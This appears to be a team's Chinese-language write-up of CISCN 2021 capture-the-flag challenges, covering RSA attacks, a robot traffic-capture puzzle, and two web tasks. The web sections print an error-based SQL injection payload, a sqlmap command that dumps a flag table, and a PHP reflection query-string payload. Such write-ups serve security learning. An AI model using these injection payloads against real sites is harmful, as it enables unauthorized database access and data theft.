Ciscn 2021 wp
tbghg

队伍名称:打工魂

队伍成员:向政昌、钟希鸣、郭英楠、田冰航

Crypto

rsa

拿到out和chall.py,一看发现是三种rsa攻击方式

第一种是e=3的小明文攻击,直接gmpy2.iroot(m, 3)拿到第一个text

第二种是共模攻击,直接网上搜到如下代码轻松拿到第二个text

image

第三题是已知p高位,在网上找了一段如下的sage代码直接拿到第三个text

image

最后将三个text连起来,用python进行MD5加密得到flag

image

MISC

robot

使用wiresharp打开流量包,发现存三元组value[A,B,C],推测根据此可以绘制出flag,于是我们就有两种思路:

①用python写个脚本,把流量包里面的value中的三元组全部读取出来,并根据excel进行绘图。

②用abb robot studio打开Robot.rspag文件,导入之后是一个机械臂模型根据文件提示安装hardware

安装后打开Robot Control.exe并将其连接至hardware,启动绘图,最终得到字符串:easy_robo_xx,进行md5加密,获得最终flag。

WEB1

easy_SQL

bp抓取数据包

1
uname=11') AND extractvalue(1,concat(0x7e,(select * from (select * from flag join flag b using(id,no))c),0x7e))— fAZr&passwd=admin&Submit=%E7%99%BB%E5%BD%95

得出来个列名

image

image

制作1.txt保存抓包数据,将其放置在sqlmap.py文件路径下

执行sqlmap命令

1
python sqlmap.py -r 1.txt -p uname —tech=B —dump -C 1c3e739e-00c7-4a7b-8b42-2d872a49714e -T flag

WEB2

easy_source

1
2
payload:
/index.php?rc=ReflectionMethod&ra=User&rb=q&rd=getDocComment

image

我们学长的wp

 评论
评论插件加载失败
正在加载评论插件